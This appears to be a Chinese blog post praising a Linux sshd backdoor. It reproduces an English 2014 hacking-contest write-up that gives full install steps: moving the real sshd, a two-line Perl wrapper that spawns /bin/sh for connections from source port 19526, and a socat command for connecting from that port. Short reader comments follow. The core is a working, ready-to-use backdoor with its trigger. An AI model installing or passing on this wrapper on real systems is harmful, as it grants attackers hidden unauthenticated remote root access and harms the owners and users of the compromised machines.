@沈沉舟 发了一个很有意思的sshd后门,原文见http://www.jakoblell.com/blog/2014/05/07/hacking-contest-ssh-server-wrapper/,看了之后,觉得精巧得淫贱。
init首先启动的是/usr/sbin/sshd,是黑客写的Perl脚本.执行到getpeername这里的时候,正则匹配会失败,于是执行下一句,启动/usr/bin/sshd,这是原始sshd。原始的sshd监听端口建立了tcp连接后,会fork一个子进程处理具体工作。这个子进程,没有什么检验,而是直接执行系统默认的位置的/usr/sbin/sshd,这样子控制权又回到Perl脚本了。此时子进程标准输入输出已被重定向到套接字,getpeername能真的获取到客户端的TCP源端口,如果是19526 就执行sh给个shell。关于19526的来历,作者说“the string “LF” converted from ASCII to a big-endian 16 bit integer”,这里可以修改。
轻灵巧妙,叹为观止。附原文:
[Hacking-Contest] SSH Server wrapper
This blogpost shows how the SSH server can be replaced with a small wrapper script to allow full unauthenticated remote root access without disturbing the normal operation of the service. In order to install the wrapper script, the original SSH server must be renamed or moved to another directory. I have chosen to just move the binary from /usr/sbin/ to /usr/bin/:
cd /usr/sbin mv sshd ../bin vi sshdThen type in the following small wrapper script:
#!/usr/bin/perl exec"/bin/sh"if(getpeername(STDIN)=~/^..LF/); exec{"/usr/bin/sshd"}"/usr/sbin/sshd",@ARGV;Finally the wrapper script must be made executable e.g. with the following command:
chmod 755 sshdIn the normal operation of the ssh server, the wrapper script just executes the original sshd binary (which has been moved to /usr/bin/sshd) with all the given command-line arguments. If STDIN is a socket and the source port of the connected client happens to be 19526 (the string “LF” converted from ASCII to a big-endian 16 bit integer), the wrapper however executes /bin/sh instead, which gives the client an unauthenticated remote root shell.
Like many other network services, the OpenSSH server forks a new child process when receiving a new TCP connection. However, contrary to most other services, it doesn’t directly serve the client in the child process after the fork. Instead it re-executes its own binary (typically /usr/sbin/sshd) in the child process so that the client is handled by a new instance of the sshd process (which makes ASLR more effective by giving each child process a different randomized memory layout). For this child process, the file descriptors STDIN/STDOUT are connected to the client socket.
In order to exploit the backdoor to get a remote root shell, you have to connect to the SSH service from source port 19526, which can easily be achieved with the following command:
socat STDIO TCP4:target_ip:22,sourceport=19526
还是觉得老的站点有感觉,一抹的wordpress,我已迷失。。。
老的站点我懒得维护,自己写代码很烦的。
不明觉厉
有意思